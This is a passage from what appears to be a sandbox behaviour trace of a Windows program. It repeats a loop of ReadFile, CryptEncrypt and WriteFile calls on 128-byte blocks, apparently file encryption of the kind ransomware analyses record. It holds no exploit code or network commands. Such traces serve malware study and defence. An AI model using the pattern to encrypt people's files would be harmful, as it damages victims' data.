lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.258] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.258] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.258] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.258] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.258] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.258] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.258] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.258] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.258] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.258] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.258] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.258] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.259] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.259] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.259] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.259] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.259] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.259] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.259] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.259] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.259] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.259] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.259] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.259] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.259] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.259] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.259] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.259] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.259] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.259] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.259] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.259] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.259] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.259] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.259] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.259] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.260] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.260] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.260] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.260] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.260] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.260] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.260] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.260] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.260] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.260] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.260] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.260] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.260] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.260] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.260] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.260] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.260] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.260] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.260] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.260] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.260] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.260] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.260] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.260] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.260] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.261] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.261] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.261] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.261] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.261] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.261] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.261] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.261] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.261] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.261] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.261] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.261] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.261] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.261] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.261] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.261] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.261] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.261] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.261] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.261] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.261] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.261] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.261] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.262] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.262] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.262] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.262] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.262] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.262] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.262] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.262] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.262] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.262] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.262] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.262] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.262] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.262] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.262] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.262] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.262] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.262] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.262] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.262] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.262] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, 